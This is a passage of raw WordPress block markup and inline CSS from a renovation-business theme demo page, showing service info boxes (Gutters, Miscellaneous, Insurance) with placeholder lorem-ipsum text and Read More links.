.skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-image-content img {\n width: 111px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/floor-modification.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h4 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Gutters</h4></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis.<br>Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/floor-modification/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#333;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#333\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"673b41df-9cb3-42e4-aa60-44dea2983a99\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-673b41df-9cb3-42e4-aa60-44dea2983a99 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-673b41df-9cb3-42e4-aa60-44dea2983a99 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-673b41df-9cb3-42e4-aa60-44dea2983a99 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-673b41df-9cb3-42e4-aa60-44dea2983a99 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-673b41df-9cb3-42e4-aa60-44dea2983a99 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-673b41df-9cb3-42e4-aa60-44dea2983a99\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/remodeling/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":27,\"title\":\"services-img1\",\"filename\":\"services-img1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"598bfdc22b\",\"delete\":\"5d1b940541\",\"edit\":\"0a4d84ebf2\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=27u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":3709,\"filesizeHumanReadable\":\"4 KB\",\"context\":\"\",\"height\":65,\"width\":65,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img1.jpg\",\"height\":65,\"width\":65,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":65,\"resshowPrefix\":false,\"counterId\":\"877dac13-99c6-40a9-9dd5-6fca441a57f3\"} -->\n<style type=\"text/css\"> .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-image-content img {\n width: 65px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img1.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\"><strong>Miscellaneous</strong></h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/remodeling/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"blockId\":\"b6bfc812-3413-49c0-a306-0ead7dc25f71\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-b6bfc812-3413-49c0-a306-0ead7dc25f71 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-b6bfc812-3413-49c0-a306-0ead7dc25f71 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-b6bfc812-3413-49c0-a306-0ead7dc25f71 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-b6bfc812-3413-49c0-a306-0ead7dc25f71 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-b6bfc812-3413-49c0-a306-0ead7dc25f71 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-b6bfc812-3413-49c0-a306-0ead7dc25f71\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/plumbing/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":30,\"title\":\"services-img4\",\"filename\":\"services-img4.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img4.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img4/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img4\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"632a5a602a\",\"delete\":\"eed2430960\",\"edit\":\"f2d09a400a\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=30u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":2845,\"filesizeHumanReadable\":\"3 KB\",\"context\":\"\",\"height\":66,\"width\":57,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img4.jpg\",\"height\":66,\"width\":57,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":57,\"resshowPrefix\":false,\"counterId\":\"0246a0b4-b038-4227-bbfb-f2e04361b8d2\"} -->\n<style type=\"text/css\"> .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-image-content img {\n width: 57px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img4.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Insurance</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/plumbing/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"colorLocation1\":68,\"colorLocation2\":44,\"backgroundColor1\":\"#072d69\",\"backgroundColor2\":\"#012257\",\"backgroundType\":\"gradient\",\"className\":\"gb-renovation-section-3\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-3 skt-blocks-block-section-outer-wrap block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c background-type-gradient alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-image:linear-gradient(90deg, rgba(7, 45, 105, 1) 68%,rgba(1, 34, 87, 1) 44%);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"8a2535a5-ba23-48dc-aa2f-8d6e2e384f43\"} -->\n<style type=\"text/css\"> .block-8a2535a5-ba23-48dc-aa2f-8d6e2e384f43 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-8a2535a5-ba23-48dc-aa2f-8d6e2e384f43 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-8a2535a5-ba23-48dc-aa2f-8d6e2e384f43 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-8a2535a5-ba23-48dc-aa2f-8d6e2e384f43 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-8a2535a5-ba23-48dc-aa2f-8d6e2e384f43 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-8a2535a5-ba23-48dc-aa2f-8d6e2e384f43 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-8a2535a5-ba23-48dc-aa2f-8d6e2e384f43 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-8a2535a5-ba23-48dc-aa2f-8d6e2e384f43 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":34,\"rightPaddingTablet\":0,\"blockId\":\"9c28eb24-8a51-4aaa-b8b9-2c2b39522605\"} -->\n<style type=\"text/css\"> .block-9c28eb24-8a51-4aaa-b8b9-2c2b39522605 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-9c28eb24-8a51-4aaa-b8b9-2c2b39522605 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-9c28eb24-8a51-4aaa-b8b9-2c2b39522605 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-9c28eb24-8a51-4aaa-b8b9-2c2b39522605 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 0px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-9c28eb24-8a51-4aaa-b8b9-2c2b39522605 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div 